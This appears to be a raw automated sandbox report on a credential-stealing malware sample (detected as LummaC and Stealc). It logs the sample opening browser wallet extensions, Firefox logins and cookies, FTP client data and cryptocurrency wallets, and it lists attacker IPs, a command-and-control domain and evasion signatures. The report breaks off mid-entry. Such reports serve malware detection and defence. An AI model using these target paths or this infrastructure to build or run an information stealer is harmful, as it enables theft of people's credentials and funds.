Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: 2ada66c192.exe Binary or memory string: WIN_81
Source: 2ada66c192.exe Binary or memory string: WIN_XP
Source: 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 2ada66c192.exe Binary or memory string: WIN_XPe
Source: 2ada66c192.exe Binary or memory string: WIN_VISTA
Source: 2ada66c192.exe Binary or memory string: WIN_7
Source: 2ada66c192.exe Binary or memory string: WIN_8
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2656254636.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2656059323.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2722206799.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2576907728.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2572489789.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2520611019.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2657437696.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2543919841.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2545054746.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2543892695.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2717480504.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2657790629.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2497346871.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2684316064.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2630336262.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2545193277.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2630205909.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2572381559.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 7872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 3512, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 2ada66c192.exe PID: 1364, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 7872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 3512, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2760593914.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2534662557.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2673057530.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2575911980.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ACEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 6_2_00ACEC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ACDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 6_2_00ACDF51
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006F1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 11_2_006F1204
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006F1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_006F1806
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571971 Sample: file.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 86 youtube.com 2->86 88 spocs.getpocket.com 2->88 90 18 other IPs or domains 2->90 112 Suricata IDS alerts for network traffic 2->112 114 Found malware configuration 2->114 116 Antivirus detection for URL or domain 2->116 118 16 other signatures 2->118 9 skotes.exe 4 25 2->9         started        14 file.exe 5 2->14         started        16 ae5cfd188c.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 106 185.215.113.43, 49758, 49764, 49787 WHOLESALECONNECTIONSNL Portugal 9->106 108 185.215.113.16, 49770, 49791, 49815 WHOLESALECONNECTIONSNL Portugal 9->108 74 C:\Users\user\AppData\...\9c2827fca4.exe, PE32 9->74 dropped 76 C:\Users\user\AppData\...\2ada66c192.exe, PE32 9->76 dropped 78 C:\Users\user\AppData\...\37df924488.exe, PE32 9->78 dropped 84 5 other malicious files 9->84 dropped 146 Creates multiple autostart registry keys 9->146 148 Hides threads from debuggers 9->148 150 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->150 20 ae5cfd188c.exe 12 9->20         started        24 9c2827fca4.exe 9->24         started        26 37df924488.exe 13 9->26         started        28 2ada66c192.exe 9->28         started        80 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->80 dropped 82 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->82 dropped 152 Detected unpacking (changes PE section rights) 14->152 154 Tries to evade debugger and weak emulator (self modifying code) 14->154 156 Tries to detect virtualization through RDTSC time measurements 14->156 30 skotes.exe 14->30         started        158 Query firmware table information (likely to detect VMs) 16->158 160 Found many strings related to Crypto-Wallets (likely being stolen) 16->160 162 Tries to harvest and steal ftp login credentials 16->162 168 2 other signatures 16->168 164 Binary is likely a compiled AutoIt script file 18->164 166 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->166 32 firefox.exe 18->32         started        34 taskkill.exe 18->34         started        36 taskkill.exe 18->36         started        38 3 other processes 18->38 file6 signatures7 process8 dnsIp9 92 atten-supporse.biz 104.21.48.1, 443, 49781, 49790 CLOUDFLARENETUS United States 20->92 120 Antivirus detection for dropped file 20->120 122 Multi AV Scanner detection for dropped file 20->122 124 Detected unpacking (changes PE section rights) 20->124 138 3 other signatures 20->138 40 chrome.exe 20->40         started        43 chrome.exe 20->43         started        126 Tries to detect sandboxes and other dynamic analysis tools (window names) 24->126 128 Machine Learning detection for dropped file 24->128 130 Modifies windows update settings 24->130 140 3 other signatures 24->140 94 185.215.113.206, 49807, 49870, 80 WHOLESALECONNECTIONSNL Portugal 26->94 142 3 other signatures 26->142 132 Binary is likely a compiled AutoIt script file 28->132 134 Found API chain indicative of sandbox detection 28->134 45 taskkill.exe 28->45         started        47 taskkill.exe 28->47         started        53 4 other processes 28->53 136 Found evasive API chain (may stop execution after reading 